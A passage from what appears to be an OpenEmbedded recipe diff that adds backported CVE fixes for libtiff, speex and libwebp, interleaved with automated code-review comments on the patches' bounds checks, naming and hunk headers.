128+ * and thus influences the number of strips in the separate planarconfig.
129+ */
130+ if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
131+ tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
132+ tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
133+ tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
134+ tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
135+ tif->tif_flags &= ~TIFF_ISTILED;
136+ } else {
137+ tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
138+ tif->tif_flags |= TIFF_ISTILED;
139+ }
140+ if (!tif->tif_dir.td_nstrips) {
141+ TIFFErrorExt(tif->tif_clientdata, module,
142+ "Cannot handle zero number of %s",
143+ isTiled(tif) ? "tiles" : "strips");
144+ goto bad;
145+ }
146+ tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
147+ if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
148+ tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
149+ if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
150+#ifdef OJPEG_SUPPORT
151+ if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
152+ (isTiled(tif)==0) &&
153+ (tif->tif_dir.td_nstrips==1)) {
154+ /*
155+ * XXX: OJPEG hack.
156+ * If a) compression is OJPEG, b) it's not a tiled TIFF,
157+ * and c) the number of strips is 1,
158+ * then we tolerate the absence of stripoffsets tag,
159+ * because, presumably, all required data is in the
160+ * JpegInterchangeFormat stream.
161+ */
162+ TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
163+ } else
164+#endif
165+ {
166+ MissingRequired(tif,
167+ isTiled(tif) ? "TileOffsets" : "StripOffsets");
168+ goto bad;
169+ }
170+ }
171+
172+ if( tif->tif_mode == O_RDWR &&
173+ tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
174+ tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
175+ tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
176+ tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
177+ tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
178+ tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
179+ tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
180+ tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
181+ {
182+ /* Directory typically created with TIFFDeferStrileArrayWriting() */
183+ TIFFSetupStrips(tif);
184+ }
185+ else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
186+ {
187+ if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
188+ {
189+ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
190+ tif->tif_dir.td_nstrips,
191+ &tif->tif_dir.td_stripoffset_p))
192+ {
193+ goto bad;
194+ }
195+ }
196+ if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
197+ {
198+ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
199+ tif->tif_dir.td_nstrips,
200+ &tif->tif_dir.td_stripbytecount_p))
201+ {
202+ goto bad;
203+ }
204+ }
205+ }
206+
207 /*
208 * Make sure all non-color channels are extrasamples.
209 * If it's not the case, define them as such.
210--
2112.25.1
212
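Review bot: After this move, `td_nstrips`, `td_stripsperimage` and the `TIFF_ISTILED` flag are only set once the tag loop between the first and second inner hunks has finished; that loop is not part of the patch, so it should be confirmed on the 4.1.0 base that nothing in it calls `isTiled(tif)` or reads `td_nstrips`, since it would now see values from before this directory was parsed. The relocated `tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;` still divides without a zero check and so depends on SamplesPerPixel being validated earlier in TIFFReadDirectory(), which is outside the hunks. The `From` hash (87881e09…) also differs from the commit in the Upstream-Status URL (87f580f3…); if the patch was adapted for this version, a `Comment:` line saying so, as the two hash-named tiff patches have, would help.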
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
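--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
+From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 2 Apr 2022 22:33:31 +0200
+Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
+
+CVE: CVE-2022-1355
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ tools/tiffcp.c | 25 ++++++++++++++++++++-----
+ 1 file changed, 20 insertions(+), 5 deletions(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index fd129bb7..8d944ff6 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -274,19 +274,34 @@ main(int argc, char* argv[])
+ deftilewidth = atoi(optarg);
+ break;
+ case 'B':
+- *mp++ = 'b'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'b'; *mp = '\0';
++ }
+ break;
+ case 'L':
+- *mp++ = 'l'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'l'; *mp = '\0';
++ }
+ break;
+ case 'M':
+- *mp++ = 'm'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'm'; *mp = '\0';
++ }
+ break;
+ case 'C':
+- *mp++ = 'c'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'c'; *mp = '\0';
++ }
+ break;
+ case '8':
+- *mp++ = '8'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode)-1))
++ {
++ *mp++ = '8'; *mp = '\0';
++ }
+ break;
+ case 'x':
+ pageInSeq = 1;
+--
+2.25.1
+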
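Review bot: Each of the five added guards tests `strlen(mode)` while the write goes through `mp`, so the bound only holds as long as `mp` always equals `mode + strlen(mode)`; both variables are declared outside the hunk, and `sizeof(mode)` is the buffer size only if `mode` is an array there. Checking the cursor that is actually written through would remove that assumption: `if (mp < mode + sizeof(mode) - 1)`. When the guard fails the option is dropped silently, so a message on stderr in that case would tell the user the flag was ignored. The same five-line pattern is repeated for 'B', 'L', 'M', 'C' and '8' and would read better as one small static helper.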
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
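--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
+From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 6 Feb 2022 13:08:38 +0100
+Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0561
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 23194ced..50ebf8ac 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5683,8 +5682,9 @@
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
+- _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
++ if( dir->tdir_count )
++ _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
++ _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
+ _TIFFfree(data);
+ data=resizeddata;
+ }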
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
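--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
 SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
+DESCRIPTION = "Library provides support for the Tag Image File Format \
+(TIFF), a widely used format for storing image data. This library \
+provide means to easily access and create TIFF image files."
+HOMEPAGE = "http://www.libtiff.org/"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
 
 CVE_PRODUCT = "libtiff"
 
 SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
+ file://CVE-2020-35523.patch \
+ file://CVE-2020-35524-1.patch \
+ file://CVE-2020-35524-2.patch \
+ file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
+ file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
+ file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
+ file://CVE-2022-0865.patch \
+ file://CVE-2022-0908.patch \
+ file://CVE-2022-0907.patch \
+ file://CVE-2022-0909.patch \
+ file://CVE-2022-0891.patch \
+ file://CVE-2022-0924.patch \
+ file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
+ file://CVE-2022-34526.patch \
+ file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
+ file://CVE-2022-1354.patch \
+ file://CVE-2022-1355.patch \
+ file://CVE-2022-3570_3598.patch \
+ file://CVE-2022-3597_3626_3627.patch \
+ file://CVE-2022-3599.patch \
+ file://CVE-2022-3970.patch \
+ file://CVE-2022-48281.patch \
+ file://CVE-2023-0795_0796_0797_0798_0799.patch \
+ file://CVE-2023-0800_0801_0802_0803_0804.patch \
+ file://CVE-2023-1916.patch \
+ file://CVE-2023-25433.patch \
+ file://CVE-2023-25434-CVE-2023-25435.patch \
+ file://CVE-2023-26965.patch \
+ file://CVE-2023-26966.patch \
+ file://CVE-2023-2908.patch \
+ file://CVE-2023-3316.patch \
+ file://CVE-2023-3576.patch \
+ file://CVE-2023-3618.patch \
+ file://CVE-2023-40745.patch \
+ file://CVE-2023-41175.patch \
+ file://CVE-2022-40090.patch \
+ file://CVE-2023-6228.patch \
+ file://CVE-2023-6277-1.patch \
+ file://CVE-2023-6277-2.patch \
+ file://CVE-2023-6277-3.patch \
+ file://CVE-2023-6277-4.patch \
+ file://CVE-2023-52356.patch \
  "
 SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
 SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
 # exclude betas
 UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
 
+# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
+# and 4.1.0 doesn't have the issue
+CVE_CHECK_WHITELIST += "CVE-2015-7313"
+
 inherit autotools multilib_header
 
 CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"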
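Review bot: Two of the new SRC_URI entries, `561599c99f987dc32ae110370cfdd7df7975586b.patch` and `eecb0712f4c3a5b449f70c57988260a667ddbdef.patch`, are named after upstream hashes while the other security patches in the list are named after their CVE, so the recipe alone does not show that CVE-2022-0562 and CVE-2022-0561 are covered. Both files carry a `CVE:` tag in their headers, so tooling that reads patch headers should still see them; the gap is for a person auditing the list. Renaming them to `CVE-2022-0562.patch` and `CVE-2022-0561.patch`, or adding a `#` comment above the SRC_URI assignment that maps each hash to its CVE, would make the list self-explanatory.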
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
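--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
 SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
-HOMEPAGE = "http://libmpeg2.sourceforge.net/"
+DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
+mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
+for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
+is to have a simple test bed for libmpeg2."
+HOMEPAGE = "https://libmpeg2.sourceforge.io/"
 SECTION = "libs"
 LICENSE = "GPLv2+"
 LICENSE_FLAGS = "commercial"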
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index 417eb1d9d3..317983edb2 100644
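--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
 SUMMARY = "Sound server for Linux and Unix-like operating systems"
+DESCRIPTION = "A general purpose sound server intended to run as a middleware \
+between your applications and your hardware devices, either using ALSA or OSS."
 HOMEPAGE = "http://www.pulseaudio.org"
 AUTHOR = "Lennart Poettering"
 SECTION = "libs/multimedia"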
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
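--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
+Backport patch to fix CVE-2020-23903.
+
+CVE: CVE-2020-23903
+Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
+From: Tristan Matthews <tmatth@videolan.org>
+Date: Mon, 13 Jul 2020 23:25:03 -0400
+Subject: [PATCH] wav_io: guard against invalid channel numbers
+
+Fixes #13
+---
+ src/wav_io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/wav_io.c b/src/wav_io.c
+index b5183015..09d62eb0 100644
+--- a/src/wav_io.c
++++ b/src/wav_io.c
+@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
+ stmp = le_short(stmp);
+ *channels = stmp;
+
+- if (stmp>2)
++ if (stmp>2 || stmp<1)
+ {
+ fprintf (stderr, "Only mono and (intensity) stereo supported\n");
+ return -1;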
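Review bot: The out-parameter is written before the value is validated: `*channels = stmp;` sits above the widened check `if (stmp>2 || stmp<1)`, so on the error path the caller's variable already holds the rejected count and is only safe if every caller honours the `-1` return. Moving the assignment below the check would keep invalid values out of caller state. The message "Only mono and (intensity) stereo supported" also no longer describes the new zero-or-negative case, which makes a malformed header harder to diagnose from logs. read_wav_header() begins and continues outside the hunk.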
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
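--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
  file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
 DEPENDS = "libogg speexdsp"
 
-SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz"
+SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
+ file://CVE-2020-23903.patch \
+ "
 UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
 
 SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"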
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
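--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
+From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
+From: James Zern <jzern@google.com>
+Date: Wed, 22 Feb 2023 22:15:47 -0800
+Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
+
+This avoids a double free should the function fail prior to
+VP8BitWriterInit() and a previous trial result's buffer carried over.
+Previously in ApplyFiltersAndEncode() trial.bw (with a previous
+iteration's buffer) would be freed, followed by best.bw pointing to the
+same buffer.
+
+Since:
+187d379d add a fallback to ALPHA_NO_COMPRESSION
+
+In addition, check the return value of VP8BitWriterInit() in this
+function.
+
+Bug: webp:603
+Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
+
+CVE: CVE-2023-1999
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
+Signed-off-by: Nikhil R <nikhil.r@kpit.com>
+---
+ src/enc/alpha_enc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
+index f7c02690e3..7d205586fe 100644
+--- a/src/enc/alpha_enc.c
++++ b/src/enc/alpha_enc.c
+@@ -13,6 +13,7 @@
+
+ #include <assert.h>
+ #include <stdlib.h>
++#include <string.h>
+
+ #include "src/enc/vp8i_enc.h"
+ #include "src/dsp/dsp.h"
+@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ }
+ } else {
+ VP8LBitWriterWipeOut(&tmp_bw);
++ memset(&result->bw, 0, sizeof(result->bw));
+ return 0;
+ }
+ }
+@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ header = method | (filter << 2);
+ if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
+
+- VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
++ if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
+ ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
+ ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);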
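Review bot: The added `memset(&result->bw, 0, sizeof(result->bw));` covers only the early `return 0` exit; on the later path `if (!VP8BitWriterInit(...)) ok = 0;` the state of `result->bw` after a failure depends on VP8BitWriterInit() and on cleanup that follows the hunk, neither of which is visible here. A comment above the memset, for example `// result->bw may still hold a previous trial's buffer; clear it so the caller does not free it twice`, would record why the wipe is needed. The last inner hunk header announces 7 lines per side but only six are present, so the patch appears to rely on the patch tool tolerating a dropped trailing context line.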
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
1From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
2From: Vincent Rabaud <vrabaud@google.com>
3Date: Thu, 7 Sep 2023 21:16:03 +0200
4Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
5
6First, BuildHuffmanTable is called to check if the data is valid.
7If it is and the table is not big enough, more memory is allocated.
8
9This will make sure that valid (but unoptimized because of unbalanced
10codes) streams are still decodable.
11
12Bug: chromium:1479274
13Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
14
15CVE: CVE-2023-4863
16
17Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
18
19Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
20---
21 src/dec/vp8l_dec.c | 46 ++++++++++---------
22 src/dec/vp8li_dec.h | 2 +-
23 src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
24 src/utils/huffman_utils.h | 27 +++++++++--
25 4 files changed, 129 insertions(+), 43 deletions(-)
26
27diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
28index 93615d4..0d38314 100644
29--- a/src/dec/vp8l_dec.c
30+++ b/src/dec/vp8l_dec.c
31@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
32 int symbol;
33 int max_symbol;
34 int prev_code_len = DEFAULT_CODE_LENGTH;
35- HuffmanCode table[1 << LENGTHS_TABLE_BITS];
36+ HuffmanTables tables;
37
38- if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
39- code_length_code_lengths,
40- NUM_CODE_LENGTH_CODES)) {
41+ if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
42+ !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
43+ code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
44 goto End;
45 }
46
47@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
48 int code_len;
49 if (max_symbol-- == 0) break;
50 VP8LFillBitWindow(br);
51- p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
52+ p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
53 VP8LSetBitPos(br, br->bit_pos_ + p->bits);
54 code_len = p->value;
55 if (code_len < kCodeLengthLiterals) {
56@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
57 ok = 1;
58
59 End:
60+ VP8LHuffmanTablesDeallocate(&tables);
61 if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
62 return ok;
63 }
64@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
65 // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
66 // tree.
67 static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
68- int* const code_lengths, HuffmanCode* const table) {
69+ int* const code_lengths,
70+ HuffmanTables* const table) {
71 int ok = 0;
72 int size = 0;
73 VP8LBitReader* const br = &dec->br_;
74@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
75 VP8LMetadata* const hdr = &dec->hdr_;
76 uint32_t* huffman_image = NULL;
77 HTreeGroup* htree_groups = NULL;
78- HuffmanCode* huffman_tables = NULL;
79- HuffmanCode* huffman_table = NULL;
80+ HuffmanTables* huffman_tables = &hdr->huffman_tables_;
81 int num_htree_groups = 1;
82 int num_htree_groups_max = 1;
83 int max_alphabet_size = 0;
84@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
85 int* mapping = NULL;
86 int ok = 0;
87
88+ // Check the table has been 0 initialized (through InitMetadata).
89+ assert(huffman_tables->root.start == NULL);
90+ assert(huffman_tables->curr_segment == NULL);
91+
92 if (allow_recursion && VP8LReadBits(br, 1)) {
93 // use meta Huffman codes.
94 const int huffman_precision = VP8LReadBits(br, 3) + 2;
95@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
96
97 code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
98 sizeof(*code_lengths));
99- huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
100- sizeof(*huffman_tables));
101 htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
102
103- if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
104+ if (htree_groups == NULL || code_lengths == NULL ||
105+ !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
106+ huffman_tables)) {
107 dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
108 goto Error;
109 }
110
111- huffman_table = huffman_tables;
112 for (i = 0; i < num_htree_groups_max; ++i) {
113 // If the index "i" is unused in the Huffman image, just make sure the
114 // coefficients are valid but do not store them.
115@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
116 int max_bits = 0;
117 for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
118 int alphabet_size = kAlphabetSize[j];
119- htrees[j] = huffman_table;
120 if (j == 0 && color_cache_bits > 0) {
121 alphabet_size += (1 << color_cache_bits);
122 }
123- size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
124+ size =
125+ ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
126+ htrees[j] = huffman_tables->curr_segment->curr_table;
127 if (size == 0) {
128 goto Error;
129 }
130 if (is_trivial_literal && kLiteralMap[j] == 1) {
131- is_trivial_literal = (huffman_table->bits == 0);
132+ is_trivial_literal = (htrees[j]->bits == 0);
133 }
134- total_size += huffman_table->bits;
135- huffman_table += size;
136+ total_size += htrees[j]->bits;
137+ huffman_tables->curr_segment->curr_table += size;
138 if (j <= ALPHA) {
139 int local_max_bits = code_lengths[0];
140 int k;
141@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
142 hdr->huffman_image_ = huffman_image;
143 hdr->num_htree_groups_ = num_htree_groups;
144 hdr->htree_groups_ = htree_groups;
145- hdr->huffman_tables_ = huffman_tables;
146
147 Error:
148 WebPSafeFree(code_lengths);
149 WebPSafeFree(mapping);
150 if (!ok) {
151 WebPSafeFree(huffman_image);
152- WebPSafeFree(huffman_tables);
153+ VP8LHuffmanTablesDeallocate(huffman_tables);
154 VP8LHtreeGroupsFree(htree_groups);
155 }
156 return ok;
157@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
158 assert(hdr != NULL);
159
160 WebPSafeFree(hdr->huffman_image_);
161- WebPSafeFree(hdr->huffman_tables_);
162+ VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
163 VP8LHtreeGroupsFree(hdr->htree_groups_);
164 VP8LColorCacheClear(&hdr->color_cache_);
165 VP8LColorCacheClear(&hdr->saved_color_cache_);
166@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
167 // Sanity checks.
168 if (dec == NULL) return 0;
169
170- assert(dec->hdr_.huffman_tables_ != NULL);
171+ assert(dec->hdr_.huffman_tables_.root.start != NULL);
172 assert(dec->hdr_.htree_groups_ != NULL);
173 assert(dec->hdr_.num_htree_groups_ > 0);
174
175diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
176index 72b2e86..32540a4 100644
177--- a/src/dec/vp8li_dec.h
178+++ b/src/dec/vp8li_dec.h
179@@ -51,7 +51,7 @@ typedef struct {
180 uint32_t* huffman_image_;
181 int num_htree_groups_;
182 HTreeGroup* htree_groups_;
183- HuffmanCode* huffman_tables_;
184+ HuffmanTables huffman_tables_;
185 } VP8LMetadata;
186
187 typedef struct VP8LDecoder VP8LDecoder;
188diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
189index 0cba0fb..9efd628 100644
190--- a/src/utils/huffman_utils.c
191+++ b/src/utils/huffman_utils.c
192@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
193 if (num_open < 0) {
194 return 0;
195 }
196- if (root_table == NULL) continue;
197 for (; count[len] > 0; --count[len]) {
198 HuffmanCode code;
199 if ((key & mask) != low) {
200- table += table_size;
201+ if (root_table != NULL) table += table_size;
202 table_bits = NextTableBitSize(count, len, root_bits);
203 table_size = 1 << table_bits;
204 total_size += table_size;
205 low = key & mask;
206- root_table[low].bits = (uint8_t)(table_bits + root_bits);
207- root_table[low].value = (uint16_t)((table - root_table) - low);
208+ if (root_table != NULL) {
209+ root_table[low].bits = (uint8_t)(table_bits + root_bits);
210+ root_table[low].value = (uint16_t)((table - root_table) - low);
211+ }
212+ }
213+ if (root_table != NULL) {
214+ code.bits = (uint8_t)(len - root_bits);
215+ code.value = (uint16_t)sorted[symbol++];
216+ ReplicateValue(&table[key >> root_bits], step, table_size, code);
217 }
218- code.bits = (uint8_t)(len - root_bits);
219- code.value = (uint16_t)sorted[symbol++];
220- ReplicateValue(&table[key >> root_bits], step, table_size, code);
221 key = GetNextKey(key, len);
222 }
223 }
224@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
225 ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
226 // Cut-off value for switching between heap and stack allocation.
227 #define SORTED_SIZE_CUTOFF 512
228-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
229+int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
230 const int code_lengths[], int code_lengths_size) {
231- int total_size;
232+ const int total_size =
